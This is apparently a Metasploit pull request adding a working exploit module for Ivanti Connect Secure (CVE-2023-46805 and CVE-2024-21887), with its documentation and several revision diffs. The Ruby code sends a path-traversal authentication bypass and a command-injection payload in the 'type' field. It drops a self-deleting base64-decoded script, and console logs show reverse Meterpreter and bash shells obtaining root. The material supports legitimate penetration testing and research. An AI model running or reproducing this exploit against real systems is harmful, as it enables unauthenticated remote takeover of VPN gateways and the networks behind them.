### PR TITLE
Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887)

### DIFF
--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
@@ -1,0 +1,174 @@
+## Vulnerable Application
+This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection
+vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are
+also vulnerable.
+
+## Testing
+To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
+below steps are for HyperV, but it should be very similar to install on VMWare.
+
+* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
+* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
+* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
+* Boot the VM and follow the console instructions to install the product.
+* After installation completes, you wil have created an admin account and password. You can log into the admin
+web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+6. `check`
+7. `exploit`
+
+## Scenarios
+To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
+Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
+
+### Linux Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set RHOST 192.168.86.111
+RHOST => 192.168.86.111
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 0
+target => 0
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      DbFmtsbLwkUU     no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
+[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
+[*] Sending stage (3045380 bytes) to 192.168.86.111
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:27576) at 2024-01-17 10:16:52 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.111
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+meterpreter >
+```
+
+### Unix Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 1
+target => 1
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
+[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
+[*] Command shell session 2 opened (192.168.86.42:4444 -> 192.168.86.111:27582) at 2024-01-17 10:19:19 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost2 4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/data/var/cores
+cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+exit
+[*] 192.168.86.111 - Command shell session 2 closed.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) >
+```

--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
@@ -13,7 +13,7 @@ below steps are for HyperV, but it should be very similar to install on VMWare.
 * From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
 * Create a new VM in HyperV and specify the VHDX file as the hard drives media.
 * Boot the VM and follow the console instructions to install the product.
-* After installation completes, you wil have created an admin account and password. You can log into the admin
+* After installation completes, you will have created an admin account and password. You can log into the admin
 web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
 
 ## Verification Steps

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe if res.code != 200
 
     # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
-    # is only for display purposes, we dont need to test the version information.
+    # is only for display purposes, we don't need to test the version information.
 
     begin
       json_data = JSON.parse(res.body)

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -113,11 +113,9 @@ class MetasploitModule < Msf::Exploit::Remote
     bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
 
     # The location of our bootstrap script. (I dont think we can use File.join in case MSF is run on Windows)
-    if datastore['FETCH_WRITABLE_DIR'].end_with? '/'
-      bootstrap_file = datastore['FETCH_WRITABLE_DIR'] << Rex::Text.rand_text_alpha(8)
-    else
-      bootstrap_file = datastore['FETCH_WRITABLE_DIR'] << '/' << Rex::Text.rand_text_alpha(8)
-    end
+    bootstrap_file = datastore['FETCH_WRITABLE_DIR']
+    bootstrap_file += '/' unless datastore['FETCH_WRITABLE_DIR'].end_with? '/'
+    bootstrap_file += Rex::Text.rand_text_alpha(8)
 
     run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}; chmod +x #{bootstrap_file}; sh #{bootstrap_file}")
   end

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -87,23 +87,22 @@ class MetasploitModule < Msf::Exploit::Remote
     # If the vendor mitigation has been applied, the request will return 403 Forbidden.
     return CheckCode::Safe if res.code != 200
 
-    # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
-    # is only for display purposes, we don't need to test the version information.
+    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON
+    # response, this is only for display purposes, we don't need to test the version information.
 
-    begin
-      json_data = JSON.parse(res.body)
+    json_data = res.get_json_document
 
-      name = json_data.dig('software-inventory', 'software', 'name')
-      version = json_data.dig('software-inventory', 'software', 'version')
-      build = json_data.dig('software-inventory', 'software', 'build')
+    name = json_data.dig('software-inventory', 'software', 'name')
 
-      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})") unless name.nil? || version.nil? || build.nil?
-    rescue JSON::ParserError
-      return CheckCode::Unknown('Failed to parse JSON data')
-    end
+    version = json_data.dig('software-inventory', 'software', 'version')
 
-    # Fall through to here if we got a JSON response but it didn't contain the expected keys.
-    CheckCode::Unknown('No version information in response')
+    build = json_data.dig('software-inventory', 'software', 'build')
+
+    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if
+    # get_json_document could not parse the JSON (and will return an empty Hash).
+    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?
+
+    Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")
   end
 
   def exploit

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -1,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module chains an authentication bypass vulnerability and a command injection vulnerability to exploit
+          vulnerable instances of Ivanti Connect Secure and achieve unauthenticated remote code execution. All currently
+          supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported
+          versions 8.x and below are also vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-46805'], # The auth bypass vulnerability.
+          ['CVE', '2024-21887'], # The command injection vulnerability.
+          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],
+          ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],
+          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']
+        ],
+        'DisclosureDate' => '2024-01-10',
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as root.
+        'Targets' => [
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/linux/http/x64/meterpreter/reverse_tcp
+            # cmd/linux/http/x64/shell/reverse_tcp
+            # cmd/linux/http/x86/shell/reverse_tcp
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD]
+            },
+          ],
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            # cmd/unix/reverse_python
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve
+    # the target system version information. If this requests succeeds, the target is vulnerable.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # If the vendor mitigation has been applied, the request will return 403 Forbidden.
+    return CheckCode::Safe if res.code != 200
+
+    begin
+      # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
+      # is only for display purposes, we dont need to test the version information.
+      json_data = JSON.parse(res.body)
+
+      name = json_data.dig('software-inventory', 'software', 'name')
+      version = json_data.dig('software-inventory', 'software', 'version')
+      build = json_data.dig('software-inventory', 'software', 'build')
+
+      return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?
+
+      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")
+    rescue JSON::ParserError
+      return CheckCode::Unknown('Failed to parse JSON data')
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    # NOTE: The Linux payloads only work when we bootstrap them using the below technique.
+
+    # A shell script to execute the Metasploit payload. Will delete itself upon execution.
+    bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
+
+    # The location of our bootstrap script. (I dont think we can use File.join in case MSF is run on Windows)
+    if datastore['FETCH_WRITABLE_DIR'].end_with? '/'
+      bootstrap_file = datastore['FETCH_WRITABLE_DIR'] << Rex::Text.rand_text_alpha(8)
+    else
+      bootstrap_file = datastore['FETCH_WRITABLE_DIR'] << '/' << Rex::Text.rand_text_alpha(8)
+    end
+
+    run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}; chmod +x #{bootstrap_file}; sh #{bootstrap_file}")
+  end
+
+  def run_os_command(cmd)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',
+      'ctype' => 'application/json',
+      'data' => {
+        'type' => ";#{cmd};",
+        'txtGCPProject' => Rex::Text.rand_text_alpha(8),
+        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),
+        'txtGCPPath' => Rex::Text.rand_text_alpha(8),
+        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)
+      }.to_json
+    )
+  end
+end

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2023-46805'], # The auth bypass vulnerability.
           ['CVE', '2024-21887'], # The command injection vulnerability.
           ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],
-          ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],
           ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']
         ],
         'DisclosureDate' => '2024-01-10',

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -15,10 +15,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',
         'Description' => %q{
-          This module chains an authentication bypass vulnerability and a command injection vulnerability to exploit
-          vulnerable instances of Ivanti Connect Secure and achieve unauthenticated remote code execution. All currently
-          supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported
-          versions 8.x and below are also vulnerable.
+          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection
+          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are
+          also vulnerable.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -107,33 +107,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # NOTE: The Linux payloads only work when we bootstrap them using the below technique.
-
-    # A shell script to execute the Metasploit payload. Will delete itself upon execution.
-    bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
-
-    # The location of our bootstrap script. (I dont think we can use File.join in case MSF is run on Windows)
-    bootstrap_file = datastore['FETCH_WRITABLE_DIR']
-    bootstrap_file += '/' unless datastore['FETCH_WRITABLE_DIR'].end_with? '/'
-    bootstrap_file += Rex::Text.rand_text_alpha(8)
-
-    # Write the payload to a tmp file and then execute it.
-    commands = [
-      "openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}",
-      "chmod +x #{bootstrap_file}",
-      "sh #{bootstrap_file}"
-    ]
-
-    run_os_command(commands.join(';'))
-  end
-
-  def run_os_command(cmd)
     send_request_cgi(
       'method' => 'POST',
       'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',
       'ctype' => 'application/json',
       'data' => {
-        'type' => ";#{cmd};",
+        'type' => ";#{payload.encoded} #",
         'txtGCPProject' => Rex::Text.rand_text_alpha(8),
         'txtGCPSecret' => Rex::Text.rand_text_alpha(8),
         'txtGCPPath' => Rex::Text.rand_text_alpha(8),

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -117,7 +117,14 @@ class MetasploitModule < Msf::Exploit::Remote
     bootstrap_file += '/' unless datastore['FETCH_WRITABLE_DIR'].end_with? '/'
     bootstrap_file += Rex::Text.rand_text_alpha(8)
 
-    run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}; chmod +x #{bootstrap_file}; sh #{bootstrap_file}")
+    # Write the payload to a tmp file and then execute it.
+    commands = [
+      "openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}",
+      "chmod +x #{bootstrap_file}",
+      "sh #{bootstrap_file}"
+    ]
+
+    run_os_command(commands.join(';'))
   end
 
   def run_os_command(cmd)

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -87,23 +87,23 @@ class MetasploitModule < Msf::Exploit::Remote
     # If the vendor mitigation has been applied, the request will return 403 Forbidden.
     return CheckCode::Safe if res.code != 200
 
+    # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
+    # is only for display purposes, we dont need to test the version information.
+
     begin
-      # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
-      # is only for display purposes, we dont need to test the version information.
       json_data = JSON.parse(res.body)
 
       name = json_data.dig('software-inventory', 'software', 'name')
       version = json_data.dig('software-inventory', 'software', 'version')
       build = json_data.dig('software-inventory', 'software', 'build')
 
-      return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?
-
-      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")
+      return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})") unless name.nil? || version.nil? || build.nil?
     rescue JSON::ParserError
       return CheckCode::Unknown('Failed to parse JSON data')
     end
 
-    CheckCode::Unknown
+    # Fall through to here if we got a JSON response but it didnt contain the keys we expected.
+    CheckCode::Unknown('No version information in response')
   end
 
   def exploit

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Failed to parse JSON data')
     end
 
-    # Fall through to here if we got a JSON response but it didnt contain the keys we expected.
+    # Fall through to here if we got a JSON response but it didn't contain the expected keys.
     CheckCode::Unknown('No version information in response')
   end
 


### PR DESCRIPTION
This is a ~draft~ pull request for the recent 0day exploit chain against Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887)

For technical details on the vulnerabilities used in this exploit, read our [AttackerKB Analysis](https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis):

## To-Do:
- [x] More testing
- [x] Documentation

## Example Usage
```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:15258) at 2024-01-16 14:37:07 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.111
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat /home/ssl-vpn-VERSION
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
meterpreter > 
```